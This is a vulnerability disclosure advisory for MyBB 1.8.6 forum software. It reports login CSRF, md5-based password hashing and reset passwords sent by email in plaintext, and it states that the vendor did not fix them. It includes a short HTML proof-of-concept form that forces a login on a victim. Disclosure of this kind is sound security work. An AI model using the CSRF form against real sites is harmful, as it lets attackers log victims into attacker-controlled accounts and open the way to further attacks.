MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords

Date: 2016-09-15 14:23:25

1. Introduction

2. Overview

MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext.

3. Login CSRF

Description

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker.

Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS.

Proof of Concept

<html> <body> <form action="http://localhost/mybb_1806/Upload/member.php" method="POST"> <input type="hidden" name="action" value="do_login" /> <input type="hidden" name="url" value="http://localhost/mybb_1806/Upload/index.php" /> <input type="hidden" name="quick_login" value="1" /> <input type="hidden" name="quick_username" value="admin" /> <input type="hidden" name="quick_password" value="admin" /> <input type="hidden" name="quick_remember" value="yes" /> <input type="hidden" name="submit" value="Login" /> <input type="submit" value="Submit request" /> </form> </body> </html>

4. Weak Hashing

Description

MyBB uses md5 for hashing passwords, which is not considered secure.

The hashing used is:

$hash = md5(md5($salt).md5($password));

5. Passwords Emailed in Plaintext

Description

When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required.

It is recommended to use a password reset token instead, and to force the user to create a new password themselves.

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline